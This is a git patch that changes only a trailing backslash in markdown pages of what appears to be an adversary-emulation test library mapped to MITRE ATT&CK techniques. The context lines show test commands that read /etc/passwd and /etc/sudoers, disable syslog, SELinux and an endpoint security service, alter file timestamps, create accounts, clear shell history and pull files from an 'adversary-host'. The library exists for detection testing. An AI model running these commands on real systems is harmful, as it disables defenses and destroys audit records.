From 31ccf34c84f6f573a22c4396fed001c08bdb6ded Mon Sep 17 00:00:00 2001
From: Brian Beyer
Date: Thu, 10 May 2018 13:51:37 -0600
Subject: [PATCH] how about one slash
---
atomics/atomic_doc_template.md.erb | 2 +-
atomics/t1046/t1046.md | 2 +-
atomics/t1087/t1087.md | 10 +++++-----
atomics/t1089/t1089.md | 8 ++++----
atomics/t1099/t1099.md | 6 +++---
atomics/t1105/t1105.md | 2 +-
atomics/t1123/t1123.md | 4 ++--
atomics/t1130/t1130.md | 2 +-
atomics/t1136/t1136.md | 4 ++--
atomics/t1139/t1139.md | 2 +-
atomics/t1146/t1146.md | 12 ++++++------
atomics/t1148/t1148.md | 2 +-
atomics/t1158/t1158.md | 2 +-
atomics/t1176/t1176.md | 6 +++---
14 files changed, 32 insertions(+), 32 deletions(-)
diff --git a/atomics/atomic_doc_template.md.erb b/atomics/atomic_doc_template.md.erb
index 27ee6050..d70115fb 100644
--- a/atomics/atomic_doc_template.md.erb
+++ b/atomics/atomic_doc_template.md.erb
@@ -35,5 +35,5 @@ MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.or ``` <%- end -%> \ -\ + <%- end -%> \ No newline at end of file
diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md
index 53c922e4..a1a859b7 100644
--- a/atomics/t1046/t1046.md
+++ b/atomics/t1046/t1046.md
@@ -20,4 +20,4 @@ done ``` \ -\ +
diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md
index 09c2670a..48b1167e 100644
--- a/atomics/t1087/t1087.md
+++ b/atomics/t1087/t1087.md
@@ -34,7 +34,7 @@ cat /etc/passwd > #{output_file} ``` \ -\ + ## Atomic Test #2 - View sudoers access xxx (requires root)
@@ -52,7 +52,7 @@ cat /etc/sudoers > #{output_file} ``` \ -\ + ## Atomic Test #3 - View accounts with UID 0 xxx
@@ -70,7 +70,7 @@ grep 'x:0:' /etc/passwd > #{output_file} ``` \ -\ + ## Atomic Test #4 - List opened files by user xxx
@@ -83,7 +83,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ``` \ -\ + ## Atomic Test #5 - Show if a user account has ever logger in remotely xxx
@@ -96,4 +96,4 @@ lastlog > #{output_file} ``` \ -\ +
diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md
index c03dc36b..4b6a1ad5 100644
--- a/atomics/t1089/t1089.md
+++ b/atomics/t1089/t1089.md
@@ -35,7 +35,7 @@ fi ``` \ -\ + ## Atomic Test #2 - Disable syslog Disables syslog collection
@@ -55,7 +55,7 @@ fi ``` \ -\ + ## Atomic Test #3 - Disable Cb Response Disable the Cb Response service
@@ -75,7 +75,7 @@ fi ``` \ -\ + ## Atomic Test #4 - Disable SELinux Disables SELinux enforcement
@@ -88,4 +88,4 @@ setenforce 0 ``` \ -\ +
diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md
index 0d4c28f5..f026c5bf 100644
--- a/atomics/t1099/t1099.md
+++ b/atomics/t1099/t1099.md
@@ -28,7 +28,7 @@ touch -a -t 197001010000.00 #{target_filename} ``` \ -\ + ## Atomic Test #2 - Set a file's modification timestamp Stomps on the modification timestamp of a file
@@ -46,7 +46,7 @@ touch -m -t 197001010000.00 #{target_filename} ``` \ -\ + ## Atomic Test #3 - Set a file's creation timestamp Stomps on the create timestamp of a file
@@ -71,4 +71,4 @@ stat #{target_filename} ``` \ -\ +
diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md
index 423ef19f..2aacf7eb 100644
--- a/atomics/t1105/t1105.md
+++ b/atomics/t1105/t1105.md
@@ -49,4 +49,4 @@ sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file ``` \ -\ +
diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md
index e8a33c0b..3707dbab 100644
--- a/atomics/t1123/t1123.md
+++ b/atomics/t1123/t1123.md
@@ -26,7 +26,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} ``` \ -\ + ## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
@@ -39,4 +39,4 @@ powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet ``` \ -\ +
diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md
index b403668f..94ded792 100644
--- a/atomics/t1130/t1130.md
+++ b/atomics/t1130/t1130.md
@@ -26,4 +26,4 @@ fi ``` \ -\ +
diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md
index 5f72d6fc..cfc73ef6 100644
--- a/atomics/t1136/t1136.md
+++ b/atomics/t1136/t1136.md
@@ -26,7 +26,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} ``` \ -\ + ## Atomic Test #2 - Create a user account on a MacOS system Creates a user on a MacOS system with dscl
@@ -44,4 +44,4 @@ dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} ``` \ -\ +
diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md
index 5f8d1612..9113aeef 100644
--- a/atomics/t1139/t1139.md
+++ b/atomics/t1139/t1139.md
@@ -24,4 +24,4 @@ cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} ``` \ -\ +
diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md
index 133374f2..8e326194 100644
--- a/atomics/t1146/t1146.md
+++ b/atomics/t1146/t1146.md
@@ -32,7 +32,7 @@ rm ~/.bash_history ``` \ -\ + ## Atomic Test #2 - Clear Bash history (echo) Clears bash history via rm
@@ -45,7 +45,7 @@ echo "" > ~/.bash_history ``` \ -\ + ## Atomic Test #3 - Clear Bash history (cat dev/null) Clears bash history via cat /dev/null
@@ -58,7 +58,7 @@ cat /dev/null > ~/.bash_history ``` \ -\ + ## Atomic Test #4 - Clear Bash history (ln dev/null) Clears bash history via a symlink to /dev/null
@@ -71,7 +71,7 @@ ln -sf /dev/null ~/.bash_history ``` \ -\ + ## Atomic Test #5 - Clear Bash history (truncate) Clears bash history via truncate
@@ -84,7 +84,7 @@ truncate -s0 ~/.bash_history ``` \ -\ + ## Atomic Test #6 - Clear history of a bunch of shells Clears the history of a bunch of different shell types by setting the history size to zero
@@ -99,4 +99,4 @@ history -c ``` \ -\ +
diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md
index dc88b2ac..d4fa6e8c 100644
--- a/atomics/t1148/t1148.md
+++ b/atomics/t1148/t1148.md
@@ -23,4 +23,4 @@ ls #{evil_command} ``` \ -\ +
diff --git a/atomics/t1158/t1158.md b/atomics/t1158/t1158.md
index a5c9783f..ac289d84 100644
--- a/atomics/t1158/t1158.md
+++ b/atomics/t1158/t1158.md
@@ -17,4 +17,4 @@ mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file ``` \ -\ +
diff --git a/atomics/t1176/t1176.md b/atomics/t1176/t1176.md
index aab85bde..9fcab409 100644
--- a/atomics/t1176/t1176.md
+++ b/atomics/t1176/t1176.md
@@ -28,7 +28,7 @@ tick 'Developer Mode'. \ -\ + ## Atomic Test #2 - Chrome (Chrome Web Store) xxx
@@ -43,7 +43,7 @@ in Chrome \ -\ + ## Atomic Test #3 - Firefox Create a file called test.wma, with the duration of 30 seconds
@@ -59,4 +59,4 @@ click "Load Temporary Add-on" 3. Then click 'Open' \ -\ +